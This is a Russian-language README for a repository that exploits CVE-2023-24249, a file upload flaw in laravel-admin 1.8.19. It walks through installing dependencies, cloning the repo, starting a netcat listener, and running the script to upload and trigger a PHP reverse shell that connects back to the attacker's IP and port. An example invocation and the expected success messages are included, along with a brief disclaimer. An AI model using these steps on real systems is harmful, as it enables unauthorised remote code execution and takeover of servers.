
Эксплойт для CVE-2023-24249 - уязвимость, позволяющая удаленное выполнение кода через загрузку файлов и внедрение команд.
Этот репозиторий содержит эксплойт-скрипт для CVE-2023-24249, критической уязвимости, обнаруженной в laravel-admin версии 1.8.19. Данная уязвимость позволяет произвольную загрузку файлов, что даёт злоумышленникам возможность выполнить произвольный код через специально созданный PHP-файл. Эксплойт демонстрирует, как злоумышленник может загрузить reverse shell в целевое приложение и выполнить его для получения удалённого доступа.
CVE-2023-24249 — это уязвимость произвольной загрузки файлов в laravel-admin v1.8.19. Данная уязвимость позволяет злоумышленникам загружать и выполнять произвольные PHP-файлы, что может привести к удалённому выполнению кода.
Предоставленный эксплойт-скрипт автоматизирует процесс эксплуатации CVE-2023-24249. Он выполняет следующие шаги:
requestsbeautifulsoup4Установите необходимые библиотеки с помощью pip:
pip install requests beautifulsoup4
Клонируйте репозиторий:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Запустите слушатель на вашей машине:
nc -lvnp <PORT>
Запустите эксплойт-скрипт:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Замените <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> и <YOUR_PORT> на соответствующие значения:
<TARGET_URL>: URL целевого приложения.<USERNAME>: Имя пользователя для аутентификации.<PASSWORD>: Пароль для аутентификации.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Если эксплойт выполнен успешно, скрипт выведет:
[+] Reverse shell успешно загружен! Выполняется попытка его запуска...
[+] Reverse shell успешно выполнен! Проверьте ваш слушатель на <YOUR_IP>:<YOUR_PORT>
Данный скрипт предназначен только для образовательных целей. Несанкционированное использование этого скрипта против любой системы без явного разрешения является незаконным и неэтичным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным скриптом.
<YOUR_IP>: Ваш IP-адрес для получения соединения reverse shell.<YOUR_PORT>: Порт, на котором работает ваш слушатель.